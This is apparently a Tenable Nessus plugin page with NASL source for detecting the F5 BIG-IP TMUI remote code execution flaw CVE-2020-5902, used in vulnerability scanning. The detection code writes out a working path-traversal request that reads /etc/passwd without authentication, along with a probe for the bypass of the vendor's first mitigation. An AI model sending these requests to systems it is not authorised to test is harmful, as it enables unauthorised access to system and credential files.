F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)

2020-07-06T00:00:00
ID F5_CVE-2020-5902.NASL
Type nessus
Reporter This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2020-07-06T00:00:00

Description

A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the Configuration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.

Note: The vendor's initial mitigation for this vulnerability can be bypassed. This plugin also tests for that bypass.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

# Description mode: when the engine loads the plugin with `description`
# set, only the metadata below is registered and the script exits before
# any request is sent. The live check starts after this block.
if (description)
{
  script_id(138140);
  script_version("1.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/08/03");

  script_cve_id("CVE-2020-5902");
  script_xref(name:"IAVA", value:"2020-A-0283");

  script_name(english:"F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)");

  script_set_attribute(attribute:"synopsis", value:
"BIG-IP Traffic Management User Interface Remote Code Execution.");
  # The description is also the analyst-facing text; it states that the
  # plugin covers both the original issue and the bypass of the vendor's
  # first mitigation, which is why two probes follow below.
  script_set_attribute(attribute:"description", value:
"A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the
Configuration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute
arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.

Note: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.
This plugin also tests for the bypass of that initial mitigation.");
  script_set_attribute(attribute:"see_also", value:"https://support.f5.com/csp/article/K52145254");
  script_set_attribute(attribute:"solution", value:
"Upgrade to a version recommended in the vendor advisory.");
  # Scoring: unauthenticated network access, full C/I/A impact.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-5902");

  # Exploitation status flags; "exploited_by_nessus" reflects that the
  # check below is a direct probe rather than a version comparison.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'F5 BIG-IP TMUI Directory Traversal and File Upload RCE');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/07/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/07/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/07/06");

  # One CPE per affected BIG-IP module so asset matching covers every
  # product line that ships TMUI.
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_access_policy_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_advanced_firewall_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_analytics");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_acceleration_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_security_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_domain_name_system");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_fraud_protection_service");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_global_traffic_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_link_controller");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_local_traffic_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_policy_enforcement_manager");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  # ACT_ATTACK: the plugin sends live requests to the target, so it runs in
  # the attack phase rather than the gather/version phase.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Only runs once bigip_web_detect.nasl has recorded a BIG-IP web
  # management install; the key gate avoids probing unrelated HTTP hosts.
  script_dependencies("bigip_web_detect.nasl");
  script_require_keys("installed_sw/F5 BIG-IP web management");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include('http.inc');
include('install_func.inc');

# Direct check. The plugin is only reached when the dependency has recorded
# a BIG-IP web management install (see script_require_keys in the
# description block), so a missing install count means nothing to test.
app = 'F5 BIG-IP web management';
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:443, ignore_broken:TRUE, embedded:TRUE);
# Return value is not consumed; the call is retained for its side effect
# (presumably an audit exit when no install is known on this port —
# confirm against install_func.inc).
install = get_single_install(app_name:app, port:port);

# Evidence markers: a root entry in passwd format for the primary probe,
# and the HSQLDB servlet banner for the mitigation-bypass probe.
passwd_pattern = "root:.*:0:[01]:";
hsqldb_marker = 'HSQL Database Engine Servlet';

poc_path = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd';
bypass_path = '/hsqldb;';

# Probe 1: the original traversal path. exit_on_fail terminates the plugin
# on a transport-level failure without recording a finding.
res = http_send_recv3(
  method       : 'GET',
  port         : port,
  item         : poc_path,
  exit_on_fail : TRUE
);

if (egrep(pattern:passwd_pattern, string:res[2]))
{
  # The JSP emits the file with escaped line breaks; restore real newlines
  # so the attached evidence reads as the original file.
  file = "/etc/passwd";
  generic = FALSE;
  line_limit = 10;
  output = str_replace(string:res[2], find:'\\n', replace:'\n');
}
else
{
  # Probe 2: bypass of the vendor's initial mitigation.
  res = http_send_recv3(
    method       : 'GET',
    port         : port,
    item         : bypass_path,
    exit_on_fail : TRUE
  );

  # Neither probe produced evidence: report not affected and stop.
  if (hsqldb_marker >!< res[2])
    audit(AUDIT_WEB_APP_NOT_AFFECTED, app, build_url(qs:"/", port:port));

  # The servlet page itself is the evidence; no file attribution applies,
  # and a short excerpt is enough for the analyst.
  file = NULL;
  generic = TRUE;
  line_limit = 3;
  output = chomp(res[2]);
}

# http_last_sent_request() is whichever probe produced the evidence: the
# traversal request on the first path, the bypass request on the second.
security_report_v4(
  port        : port,
  severity    : SECURITY_HOLE,
  request     : make_list(http_last_sent_request()),
  file        : file,
  generic     : generic,
  output      : output,
  line_limit  : line_limit,
  attach_type : 'text/plain'
);